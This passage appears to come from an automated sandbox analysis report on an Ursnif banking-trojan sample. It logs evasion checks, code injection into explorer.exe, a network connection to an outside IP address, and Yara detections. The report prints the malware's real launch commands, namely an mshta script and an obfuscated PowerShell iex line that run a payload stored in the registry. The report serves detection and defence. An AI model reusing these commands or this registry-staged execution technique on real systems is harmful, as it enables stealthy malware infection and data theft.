                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Uses ping.exe to sleep
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6148Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6900Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4995Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2575Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: explorer.exe, 00000021.00000000.575738488.0000000006389000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 00000021.00000000.534245853.0000000007C08000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
                      Source: explorer.exe, 00000021.00000000.534245853.0000000007C08000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000021.00000000.524566576.0000000004150000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}:
                      Source: explorer.exe, 00000021.00000000.534245853.0000000007C08000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i&
                      Source: RuntimeBroker.exe, 00000029.00000000.593267648.00000188B362A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}6bf
                      Source: explorer.exe, 00000021.00000000.534612496.0000000007D2A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: explorer.exe, 00000021.00000000.534245853.0000000007C08000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00Iy
                      Source: explorer.exe, 00000021.00000000.534463390.0000000007CC2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000v
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 146.70.35.138 80Jump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6B9F112E0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF6B9F112E0Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 42C000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FF8DBEB1580Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 910000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FF8DBEB1580Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 430000
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF8DBEB1580
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 2650000
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1FAB525000
                      Changes memory attributes in foreign processes to executable or writable
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF8DBEB1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF8DBEB1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF8DBEB1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF8DBEB1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF8DBEB1580 protect: page execute and read and write
                      Allocates memory in foreign processes
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 2650000 protect: page execute and read and write
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3808 base: 42C000 value: 00Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3808 base: 7FF8DBEB1580 value: EBJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3808 base: 910000 value: 80Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3808 base: 7FF8DBEB1580 value: 40Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3808 base: 430000 value: 00
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3808 base: 7FF8DBEB1580 value: EB
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3808 base: 2650000 value: 80
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 6020Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3808Jump to behavior
                      Source: C:\Windows\System32\control.exeThread register set: target process: 3808
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: DBEB1580Jump to behavior
                      Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: DBEB1580
                      Source: C:\Windows\explorer.exeThread created: C:\Windows\System32\RuntimeBroker.exe EIP: DBEB1580
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lpje='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lpje).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD841.tmp" "c:\Users\user\AppData\Local\Temp\pkbugtxo\CSC26C720E9EBC041F086604EECC7DD3CDD.TMP"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESED31.tmp" "c:\Users\user\AppData\Local\Temp\lboh4mlq\CSC3DF21D054A9F4C66BF1FA9CD771B1F79.TMP"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: explorer.exe, 00000021.00000000.523000096.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.572023621.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.562172820.0000000000D00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerG
                      Source: explorer.exe, 00000021.00000000.523000096.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.527408975.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.580135595.0000000005920000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000021.00000000.523000096.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.572023621.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.562172820.0000000000D00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000021.00000000.523000096.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.572023621.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.562172820.0000000000D00000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000021.00000000.522462073.0000000000628000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.571046642.0000000000628000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.525990787.0000000000628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanPV*
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE12D3 cpuid 3_2_04DE12D3
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE5410 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,3_2_04DE5410
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE515F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_04DE515F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE12D3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,3_2_04DE12D3

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391081269.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.439315042.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.436001223.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.438329210.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391236122.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390852806.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390783473.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390963737.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391015018.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390663420.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391212771.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7148, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6932, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6020, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.4de0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5456940.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53aa4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53aa4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4c794a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4c794a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54294a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54294a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.438131198.00000000053AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.517494573.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.515954749.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.516723035.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.438206007.0000000005429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.566002484.0000000004C79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.568306199.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.569427566.000000000512F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391081269.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.439315042.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.436001223.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.438329210.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391236122.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390852806.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390783473.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390963737.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391015018.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390663420.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391212771.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7148, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6932, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6020, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.4de0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5456940.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53aa4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53aa4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4c794a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4c794a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54294a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54294a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.438131198.00000000053AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.517494573.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.515954749.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.516723035.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.438206007.0000000005429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
